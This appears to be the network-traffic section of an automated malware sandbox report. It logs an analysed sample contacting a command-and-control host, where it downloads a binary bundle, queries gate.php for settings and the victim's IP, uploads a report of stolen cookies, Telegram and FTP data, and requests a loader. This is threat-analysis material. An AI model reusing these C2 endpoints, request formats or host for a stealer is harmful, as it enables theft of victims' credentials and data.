Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 134.209.203.126 | Active | Moloch |

| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | | |
GET 200 http://134.209.203.126/hornycock/system/assets/bundle.bin

REQUEST
GET /hornycock/system/assets/bundle.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Host: 134.209.203.126

RESPONSE
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:41 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 13 Jun 2021 13:48:00 GMT
ETag: "4f1c00-5c4a5fd304400"
Accept-Ranges: bytes
Content-Length: 5184512
Content-Type: application/octet-stream
GET 200 http://134.209.203.126/hornycock/gate.php?type=settings

REQUEST
GET /hornycock/gate.php?type=settings HTTP/1.1
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126

RESPONSE
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:47 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 644
Content-Type: text/html; charset=UTF-8
GET 200 http://134.209.203.126/hornycock/gate.php?type=ip

REQUEST
GET /hornycock/gate.php?type=ip HTTP/1.1
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126

RESPONSE
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:48 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 15
Content-Type: text/html; charset=UTF-8
GET 200 http://134.209.203.126/hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1

REQUEST
GET /hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126
Content-Length: 1420263

RESPONSE
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
GET 200 http://134.209.203.126/hornycock/gate.php?type=loader&tag=traffer1

REQUEST
GET /hornycock/gate.php?type=loader&tag=traffer1 HTTP/1.1
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126

RESPONSE
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts